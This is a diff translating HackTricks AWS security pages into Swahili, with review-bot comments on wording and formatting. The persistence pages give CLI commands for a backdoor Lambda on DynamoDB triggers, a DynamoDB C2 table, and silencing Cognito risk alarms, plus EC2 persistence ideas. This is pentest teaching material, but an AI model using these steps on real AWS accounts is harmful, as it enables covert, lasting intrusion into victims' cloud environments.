+Ili mtumiaji wa kawaida aidhinishe kwa AWS kupitia CLI unahitaji kuwa na **akiba za ndani**. Kwa kawaida unaweza kuziunda **kwa mikono** katika `~/.aws/credentials` au kwa **kukimbia** `aws configure`.\
+Katika faili hiyo unaweza kuwa na zaidi ya profaili moja, ikiwa **hakuna profaili** iliyotajwa kwa kutumia **aws cli**, ile inayoitwa **`[default]`** katika faili hiyo itatumika.\
+Mfano wa faili la akiba lenye zaidi ya profaili 1:
```
[default]
aws_access_key_id = AKIA5ZDCUJHF83HDTYUT
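Review bot: "kwa **kukimbia** `aws configure`" uses the verb for physically running; for executing a command the usual word is kuendesha, and the same choice should be used wherever "run" appears in the file. "akiba za ndani" for "local credentials" has the same terminology problem as the previous hunk (akreditif would match the IAM sections), and the heading "### Uthibitishaji wa CLI" lost the blank line that separated it from the paragraph below, which is harmless to the renderer but inconsistent with the rest of the page.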
@@ -354,12 +341,10 @@ aws_access_key_id = AKIA8YDCu7TGTR356SHYT
aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7
region = eu-west-2
```
-
If you need to access **different AWS accounts** and your profile was given access to **assume a role inside those accounts**, you don't need to call manually STS every time (`aws sts assume-role --role-arn --role-session-name sessname`) and configure the credentials.
You can use the `~/.aws/config` file to[ **indicate which roles to assume**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\
-A config file example:
-
+Mfano wa faili la usanidi:
```
[profile acc2]
region=eu-west-2
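Review bot: The two paragraphs beginning "If you need to access **different AWS accounts**" and "You can use the `~/.aws/config` file" are left in English while everything around them is translated; they appear here as unchanged context lines, so either this hunk or a follow-up should translate them so the section does not switch language mid-flow.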
@@ -368,23 +353,16 @@ role_session_name =
source_profile =
sts_regional_endpoints = regional
```
-
-With this config file you can then use aws cli like:
-
+Na faili hii ya usanidi unaweza kutumia aws cli kama:
```
aws --profile acc2 ...
```
+Ikiwa unatafuta kitu **kama** hiki lakini kwa **browser** unaweza kuangalia **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en).
-If you are looking for something **similar** to this but for the **browser** you can check the **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en).
-
-## References
+## Marejeleo
- [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html)
- [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/)
- [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
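Review bot: "Na faili hii ya usanidi" treats faili as a class 9 noun, while the preceding hunk wrote "faili la usanidi" and "faili la akiba" (class 5) for the same kind of file; pick one agreement and use it consistently across the page. Removing the blank line before the `aws --profile acc2 ...` fence and the trailing empty lines at the end of the file is fine.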
diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
index 73ae6b448..f81491291 100644
--- a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
+++ b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
@@ -4,84 +4,81 @@
## SAML
-For info about SAML please check:
+Kwa maelezo kuhusu SAML tafadhali angalia:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/saml-attacks
{{#endref}}
-In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key)
+Ili kuunda **Utambulisho wa Shirikisho kupitia SAML** unahitaji tu kutoa **jina** na **metadata XML** inayojumuisha usanidi wote wa SAML (**mipaka**, **cheti** chenye funguo za umma)
## OIDC - Github Actions Abuse
-In order to add a github action as Identity provider:
-
-1. For _Provider type_, select **OpenID Connect**.
-2. For _Provider URL_, enter `https://token.actions.githubusercontent.com`
-3. Click on _Get thumbprint_ to get the thumbprint of the provider
-4. For _Audience_, enter `sts.amazonaws.com`
-5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like:
- - ```json
- {
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
- },
- "Action": "sts:AssumeRoleWithWebIdentity",
- "Condition": {
- "StringEquals": {
- "token.actions.githubusercontent.com:sub": [
- "repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
- "repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
- ],
- "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
- }
- }
- }
- ]
- }
- ```
-6. Note in the previous policy how only a **branch** from **repository** of an **organization** was authorized with a specific **trigger**.
-7. The **ARN** of the **role** the github action is going to be able to **impersonate** is going to be the "secret" the github action needs to know, so **store** it inside a **secret** inside an **environment**.
-8. Finally use a github action to configure the AWS creds to be used by the workflow:
+Ili kuongeza hatua ya github kama Mtoa Utambulisho:
+1. Kwa _Aina ya Mtoa_, chagua **OpenID Connect**.
+2. Kwa _URL ya Mtoa_, ingiza `https://token.actions.githubusercontent.com`
+3. Bonyeza _Pata thumbprint_ ili kupata thumbprint ya mtoa
+4. Kwa _Watazamaji_, ingiza `sts.amazonaws.com`
+5. Unda **jukumu jipya** lenye **idhini** zinazohitajika na hatua ya github na **sera ya kuamini** inayomwamini mtoa kama:
+- ```json
+{
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"token.actions.githubusercontent.com:sub": [
+"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
+"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
+],
+"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
+}
+}
+}
+]
+}
+```
+6. Kumbuka katika sera iliyopita jinsi tu **tawi** kutoka **hifadhi** ya **shirika** lilihitajika kwa **kichocheo** maalum.
+7. **ARN** ya **jukumu** ambalo hatua ya github itakuwa na uwezo wa **kujifanya** itakuwa "siri" ambayo hatua ya github inahitaji kujua, hivyo **hifadhi** ndani ya **siri** ndani ya **mazingira**.
+8. Hatimaye tumia hatua ya github kuunda AWS creds zitakazotumika na mchakato:
```yaml
name: "test AWS Access"
# The workflow should only trigger on pull requests to the main branch
on:
- pull_request:
- branches:
- - main
+pull_request:
+branches:
+- main
# Required to get the ID Token that will be used for OIDC
permissions:
- id-token: write
- contents: read # needed for private repos to checkout
+id-token: write
+contents: read # needed for private repos to checkout
jobs:
- aws:
- runs-on: ubuntu-latest
- steps:
- - name: Checkout
- uses: actions/checkout@v3
+aws:
+runs-on: ubuntu-latest
+steps:
+- name: Checkout
+uses: actions/checkout@v3
- - name: Configure AWS Credentials
- uses: aws-actions/configure-aws-credentials@v1
- with:
- aws-region: eu-west-1
- role-to-assume:${{ secrets.READ_ROLE }}
- role-session-name: OIDCSession
+- name: Configure AWS Credentials
+uses: aws-actions/configure-aws-credentials@v1
+with:
+aws-region: eu-west-1
+role-to-assume:${{ secrets.READ_ROLE }}
+role-session-name: OIDCSession
- - run: aws sts get-caller-identity
- shell: bash
+- run: aws sts get-caller-identity
+shell: bash
```
-
-## OIDC - EKS Abuse
-
+## OIDC - EKS Dhulumu
```bash
# Crate an EKS cluster (~10min)
eksctl create cluster --name demo --fargate
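Review bot: the translated steps 5 and 8 strip the indentation that made the JSON fence and the workflow YAML part of the numbered list, and the unindented YAML no longer reproduces the intended structure: `pull_request:` and `branches:` at column 0 are no longer children of `on:`, `id-token: write` is no longer under `permissions:`, and `uses: actions/checkout@v3` at column 0 after `- name: Checkout` is not part of that step, so the workflow will not load as shown. Restore the nesting from the removed lines (the fence and JSON indented under item 5, the YAML keys under their parents), otherwise items 6 to 8 will also not render as a continuation of the list. While here, `role-to-assume:${{ secrets.READ_ROLE }}` lacks a space after the colon in both the old and new versions and is therefore not a valid key/value pair; it should read `role-to-assume: ${{ secrets.READ_ROLE }}`. On terminology, `mipaka` means boundaries rather than endpoints, and `Watazamaji` (spectators) for the console field _Audience_ will not match what the reader sees in the IAM console; keeping the console labels (_Provider type_, _Provider URL_, _Get thumbprint_, _Audience_) in English next to the Swahili wording would make the steps easier to follow.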
@@ -91,43 +88,34 @@ eksctl create cluster --name demo --fargate
# Create an Identity Provider for an EKS cluster
eksctl utils associate-iam-oidc-provider --cluster Testing --approve
```
-
-It's possible to generate **OIDC providers** in an **EKS** cluster simply by setting the **OIDC URL** of the cluster as a **new Open ID Identity provider**. This is a common default policy:
-
+Ni rahisi kuunda **OIDC providers** katika **EKS** cluster kwa kuweka **OIDC URL** ya cluster kama **mtoa kitambulisho kipya cha Open ID**. Hii ni sera ya kawaida ya default:
```json
{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
- },
- "Action": "sts:AssumeRoleWithWebIdentity",
- "Condition": {
- "StringEquals": {
- "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
- }
- }
- }
- ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
+}
+}
+}
+]
}
```
+Hii sera inadhihirisha kwa usahihi kwamba **tu** **EKS cluster** yenye **id** `20C159CDF6F2349B68846BEC03BE031B` inaweza kuchukua jukumu. Hata hivyo, haionyeshi ni akaunti gani ya huduma inaweza kuchukua jukumu hilo, ambayo inamaanisha kwamba **AKAUNTI YOYOTE YA HUDUMA yenye tokeni ya utambulisho wa wavuti** itakuwa **na uwezo wa kuchukua** jukumu hilo.
-This policy is correctly indicating than **only** the **EKS cluster** with **id** `20C159CDF6F2349B68846BEC03BE031B` can assume the role. However, it's not indicting which service account can assume it, which means that A**NY service account with a web identity token** is going to be **able to assume** the role.
-
-In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as:
-
+Ili kubainisha **ni akaunti gani ya huduma inapaswa kuwa na uwezo wa kuchukua jukumu,** inahitajika kubainisha **hali** ambapo **jina la akaunti ya huduma limebainishwa**, kama:
```bash
"oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account",
```
-
-## References
+## Marejeleo
- [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
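Review bot: `Ni rahisi kuunda` ("it is easy to create") changes the meaning of the original `It's possible to generate`; `Inawezekana kuunda` keeps it. The security point of this section, that a trust policy with only the `:aud` condition lets any service account in the cluster assume the role, survives the translation, but the fix snippet that follows is fenced as a bash block although it is a JSON condition fragment; tagging it as json would be more accurate. Dropping the blank lines before the fences is harmless in Markdown, but stripping the indentation inside the JSON trust policy makes the nesting hard to follow and invites copy-paste errors; keep the original indentation inside code blocks.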
diff --git a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
index 28868b9f1..41e654742 100644
--- a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
+++ b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
@@ -2,20 +2,16 @@
{{#include ../../banners/hacktricks-training.md}}
-These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools:
+Hizi ndizo ruhusa unazohitaji kwenye kila akaunti ya AWS unayotaka kukagua ili uweze kuendesha zana zote zilizopendekezwa za ukaguzi wa AWS:
-- The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
-- To run [aws_iam_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions:
- - **access-analyzer:List\***
- - **access-analyzer:Get\***
- - **iam:CreateServiceLinkedRole**
- - **access-analyzer:CreateAnalyzer**
- - Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission)
- - **access-analyzer:DeleteAnalyzer**
- - Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission)
+- Sera ya default **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
+- Ili kuendesha [aws_iam_review](https://github.com/carlospolop/aws_iam_review) unahitaji pia ruhusa zifuatazo:
+- **access-analyzer:List\***
+- **access-analyzer:Get\***
+- **iam:CreateServiceLinkedRole**
+- **access-analyzer:CreateAnalyzer**
+- Hiari ikiwa mteja anaunda wachambuzi kwa ajili yako, lakini kwa kawaida ni rahisi tu kuomba ruhusa hii)
+- **access-analyzer:DeleteAnalyzer**
+- Hiari ikiwa mteja anafuta wachambuzi kwa ajili yako, lakini kwa kawaida ni rahisi tu kuomba ruhusa hii)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
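Review bot: the nested list is flattened; `- **access-analyzer:List\***` and the permissions after it were children of the `aws_iam_review` bullet, and the two `Hiari ikiwa ...` lines were children of `access-analyzer:CreateAnalyzer` and `access-analyzer:DeleteAnalyzer`. At column 0 they render as siblings of the ReadOnlyAccess bullet, and the two optional notes read as standalone items with no permission attached, so a reader cannot tell which permissions are optional. Restore the two-space and four-space indentation from the removed lines. Also pre-existing in both versions: each optional note ends with an unmatched `)`; either add the opening parenthesis or drop the closing one.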
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/README.md
index f3b45c4d3..5b7f4eaee 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/README.md
@@ -1,6 +1 @@
-# AWS - Persistence
-
-
-
-
-
+# AWS - Uendelevu
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
index 6d2b0ec35..e35ab9075 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
@@ -4,7 +4,7 @@
## API Gateway
-For more information go to:
+Kwa maelezo zaidi tembelea:
{{#ref}}
../aws-services/aws-api-gateway-enum.md
@@ -12,25 +12,21 @@ For more information go to:
### Resource Policy
-Modify the resource policy of the API gateway(s) to grant yourself access to them
+Badilisha sera ya rasilimali ya API gateway(s) ili kujipatia ufikiaji.
### Modify Lambda Authorizers
-Modify the code of lambda authorizers to grant yourself access to all the endpoints.\
-Or just remove the use of the authorizer.
+Badilisha msimbo wa waandishi wa lambda ili kujipatia ufikiaji wa mwisho wote.\
+Au ondolewa matumizi ya mwandishi.
### IAM Permissions
-If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\
-Or just remove the use of the authorizer.
+Ikiwa rasilimali inatumia mwandishi wa IAM unaweza kujipatia ufikiaji kwa kubadilisha ruhusa za IAM.\
+Au ondolewa matumizi ya mwandishi.
### API Keys
-If API keys are used, you could leak them to maintain persistence or even create new ones.\
-Or just remove the use of API keys.
+Ikiwa funguo za API zinatumika, unaweza kuvuja ili kudumisha uendelevu au hata kuunda mpya.\
+Au ondolewa matumizi ya funguo za API.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
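Review bot: `waandishi wa lambda` and `mwandishi wa IAM` mean writers or authors, not authorizers, so `### Modify Lambda Authorizers` and the IAM section now describe editing the code of the Lambda's authors. "Lambda authorizer" and "IAM authorizer" are API Gateway product terms and should stay untranslated, and `ufikiaji wa mwisho wote` (access to the whole end) should be `ufikiaji wa endpoints zote`. `Au ondolewa matumizi ya ...` is a passive form; the imperative matching the original `Or just remove the use of ...` is `Au ondoa tu matumizi ya ...`.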
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
index e2e037e53..1947d1c69 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
@@ -4,7 +4,7 @@
## Cognito
-For more information, access:
+Kwa maelezo zaidi, tembelea:
{{#ref}}
../aws-services/aws-cognito-enum/
@@ -12,16 +12,16 @@ For more information, access:
### User persistence
-Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like:
+Cognito ni huduma inayoruhusu kutoa majukumu kwa watumiaji wasio na uthibitisho na watumiaji walio na uthibitisho na kudhibiti directory ya watumiaji. Mipangilio kadhaa tofauti inaweza kubadilishwa ili kudumisha baadhi ya uvumilivu, kama vile:
-- **Adding a User Pool** controlled by the user to an Identity Pool
-- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow**
- - Or to an **authenticated Identity Pool** if the attacker can login
- - Or **improve the permissions** of the given roles
-- **Create, verify & privesc** via attributes controlled users or new users in a **User Pool**
-- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool
+- **Kuongeza User Pool** inayodhibitiwa na mtumiaji kwa Identity Pool
+- Kutoa **IAM role kwa Identity Pool isiyo na uthibitisho na kuruhusu mchakato wa Basic auth**
+- Au kwa **Identity Pool iliyo na uthibitisho** ikiwa mshambuliaji anaweza kuingia
+- Au **kuboresha ruhusa** za majukumu yaliyotolewa
+- **Kuunda, kuthibitisha & privesc** kupitia sifa zinazodhibitiwa na watumiaji au watumiaji wapya katika **User Pool**
+- **Kuruhusu Watoa Utambulisho wa Nje** kuingia katika User Pool au katika Identity Pool
-Check how to do these actions in
+Angalia jinsi ya kufanya vitendo hivi katika
{{#ref}}
../aws-privilege-escalation/aws-cognito-privesc.md
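Review bot: the two sub-items `Au kwa **Identity Pool iliyo na uthibitisho** ...` and `Au **kuboresha ruhusa** ...` lose the indentation that made them alternatives under the unauthenticated Identity Pool bullet, so they now read as two unrelated top-level options; restore the two-space indent. `uvumilivu` means patience or tolerance, not persistence; this same commit uses `Uendelevu` for the section title in `aws-persistence/README.md`, so `uendelevu` should be used here as well.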
@@ -29,18 +29,12 @@ Check how to do these actions in
### `cognito-idp:SetRiskConfiguration`
-An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options:
-
+Mshambuliaji mwenye ruhusa hii anaweza kubadilisha usanidi wa hatari ili kuweza kuingia kama mtumiaji wa Cognito **bila kuanzisha alama za tahadhari**. [**Angalia cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) ili kuangalia chaguzi zote:
```bash
aws cognito-idp set-risk-configuration --user-pool-id --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION}
```
-
-By default this is disabled:
+Kwa kawaida hii imezimwa:
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
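Review bot: `Kwa kawaida hii imezimwa:` ends with a colon and nothing follows, same as the original `By default this is disabled:`; the line appears to have introduced a screenshot that is not in the source, so either drop the colon or restore the image reference. Pre-existing in both versions: the CLI example passes `--user-pool-id` with no value; a placeholder such as `--user-pool-id <pool-id>` would make clear that the reader must supply it.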
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
index 75a824e73..d668fbe93 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
@@ -4,7 +4,7 @@
### DynamoDB
-For more information access:
+Kwa maelezo zaidi tembelea:
{{#ref}}
../aws-services/aws-dynamodb-enum.md
@@ -12,56 +12,48 @@ For more information access:
### DynamoDB Triggers with Lambda Backdoor
-Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account.
-
+Kwa kutumia vichocheo vya DynamoDB, mshambuliaji anaweza kuunda **backdoor ya siri** kwa kuunganisha kazi ya Lambda yenye uharibifu na jedwali. Kazi ya Lambda inaweza kuchochewa wakati kipengee kinapoongezwa, kubadilishwa, au kufutwa, ikimruhusu mshambuliaji kutekeleza msimbo wowote ndani ya akaunti ya AWS.
```bash
# Create a malicious Lambda function
aws lambda create-function \
- --function-name MaliciousFunction \
- --runtime nodejs14.x \
- --role \
- --handler index.handler \
- --zip-file fileb://malicious_function.zip \
- --region
+--function-name MaliciousFunction \
+--runtime nodejs14.x \
+--role \
+--handler index.handler \
+--zip-file fileb://malicious_function.zip \
+--region
# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
- --table-name TargetTable \
- --region
+--table-name TargetTable \
+--region
# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
- --function-name MaliciousFunction \
- --event-source \
- --region
+--function-name MaliciousFunction \
+--event-source \
+--region
```
+Ili kudumisha uvumilivu, mshambuliaji anaweza kuunda au kubadilisha vitu katika meza ya DynamoDB, ambayo itasababisha kazi ya Lambda yenye uharibifu. Hii inamruhusu mshambuliaji kutekeleza msimbo ndani ya akaunti ya AWS bila mwingiliano wa moja kwa moja na kazi ya Lambda.
-To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function.
-
-### DynamoDB as a C2 Channel
-
-An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands.
+### DynamoDB kama Kituo cha C2
+Mshambuliaji anaweza kutumia meza ya DynamoDB kama **kituo cha amri na udhibiti (C2)** kwa kuunda vitu vyenye amri na kutumia mifano iliyovunjwa au kazi za Lambda kupata na kutekeleza amri hizi.
```bash
# Create a DynamoDB table for C2
aws dynamodb create-table \
- --table-name C2Table \
- --attribute-definitions AttributeName=CommandId,AttributeType=S \
- --key-schema AttributeName=CommandId,KeyType=HASH \
- --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
- --region
+--table-name C2Table \
+--attribute-definitions AttributeName=CommandId,AttributeType=S \
+--key-schema AttributeName=CommandId,KeyType=HASH \
+--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
+--region
# Insert a command into the table
aws dynamodb put-item \
- --table-name C2Table \
- --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
- --region
+--table-name C2Table \
+--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
+--region
```
-
The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
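Review bot: the final paragraph `The compromised instances or Lambda functions can periodically check the C2 table ...` is left in English while the rest of the file is translated; it needs translating too. Terminology drifts within the hunk: `jedwali` and `meza` are both used for table, and `uvumilivu` (patience) is used for persistence where the rest of the commit uses `uendelevu`. Pre-existing in both versions: `aws dynamodbstreams describe-stream` takes `--stream-arn`, not `--table-name`; the stream ARN for a table comes from `aws dynamodb describe-table --table-name TargetTable` (the `LatestStreamArn` field), which is what the `# Note the "StreamArn" from the output` comment expects, and `--event-source` on `create-event-source-mapping` should be `--event-source-arn`.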
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
index b52ac9e85..ce4194432 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
@@ -4,55 +4,51 @@
## EC2
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
{{#endref}}
-### Security Group Connection Tracking Persistence
+### Usalama wa Kundi la Kundi la Ufuatiliaji wa Muunganisho
-If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic.
+Ikiwa mlinzi atagundua kuwa **EC2 instance ilikumbwa na shambulio** atajaribu **kuweka mbali** **mtandao** wa mashine hiyo. Anaweza kufanya hivyo kwa kutumia **Deny NACL** (lakini NACL zinaathiri subnet nzima), au **kubadilisha kundi la usalama** kutoruhusu **aina yoyote ya trafiki ya ndani au nje**.
-If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
+Ikiwa mshambuliaji alikuwa na **reverse shell iliyoanzishwa kutoka kwa mashine**, hata kama SG imebadilishwa kutoruhusu trafiki ya ndani au nje, **muunganisho hautakatwa kutokana na** [**Ufuatiliaji wa Muunganisho wa Kundi la Usalama**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
-### EC2 Lifecycle Manager
+### Meneja wa Mzunguko wa EC2
-This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\
-An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**.
+Huduma hii inaruhusu **kuandaa** **kuundwa kwa AMIs na snapshots** na hata **kuzishiriki na akaunti nyingine**.\
+Mshambuliaji anaweza kuunda **uzalishaji wa AMIs au snapshots** za picha zote au volumes zote **kila wiki** na **kuzishiriki na akaunti yake**.
-### Scheduled Instances
+### Mifano ya Ratiba
-It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access.
+Inawezekana kupanga mifano kufanya kazi kila siku, kila wiki au hata kila mwezi. Mshambuliaji anaweza kuendesha mashine yenye mamlaka ya juu au ufikiaji wa kuvutia ambapo anaweza kufikia.
-### Spot Fleet Request
+### Ombi la Spot Fleet
-Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**.
+Mifano ya spot ni **za bei nafuu** kuliko mifano za kawaida. Mshambuliaji anaweza kuzindua **ombile dogo la spot fleet kwa miaka 5** (kwa mfano), kwa **ugawaji wa IP** wa kiotomatiki na **data ya mtumiaji** inayotuma kwa mshambuliaji **wakati mfano wa spot unapoanza** na **anwani ya IP** na **jukumu la IAM lenye mamlaka ya juu**.
-### Backdoor Instances
+### Mifano ya Backdoor
-An attacker could get access to the instances and backdoor them:
+Mshambuliaji anaweza kupata ufikiaji wa mifano na kuziingiza backdoor:
-- Using a traditional **rootkit** for example
-- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md))
-- Backdooring the **User Data**
+- Kutumia **rootkit** wa jadi kwa mfano
+- Kuongeza **funguo mpya za SSH za umma** (angalia [chaguzi za EC2 privesc](../aws-privilege-escalation/aws-ec2-privesc.md))
+- Kuingiza backdoor kwenye **Data ya Mtumiaji**
-### **Backdoor Launch Configuration**
+### **Mipangilio ya Uzinduzi wa Backdoor**
-- Backdoor the used AMI
-- Backdoor the User Data
-- Backdoor the Key Pair
+- Kuingiza backdoor AMI iliyotumika
+- Kuingiza backdoor Data ya Mtumiaji
+- Kuingiza backdoor Key Pair
### VPN
-Create a VPN so the attacker will be able to connect directly through i to the VPC.
+Unda VPN ili mshambuliaji aweze kuungana moja kwa moja kupitia i hadi VPC.
### VPC Peering
-Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC.
+Unda muunganisho wa peering kati ya VPC ya mwathirika na VPC ya mshambuliaji ili aweze kufikia VPC ya mwathirika.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
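Review bot: the heading `### Usalama wa Kundi la Kundi la Ufuatiliaji wa Muunganisho` duplicates `Kundi la` and drops `Persistence`; the original `Security Group Connection Tracking Persistence` names both the AWS feature (Security Group connection tracking) and the technique, so the heading needs `Uendelevu` and a single `Kundi la`, and `Security Group` is better left untranslated as the body does with `SG`. `mifano` means examples, not EC2 instances (`Mifano ya Ratiba`, `Mifano ya Backdoor`, `mifano ya spot`); the Elastic Beanstalk file in this same commit keeps `instance`, which is the consistent choice. Typos: `ombile dogo` should be `ombi dogo`, and `kupitia i hadi VPC` carries over the original `through i` (a typo for `it`); drop the stray `i`.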
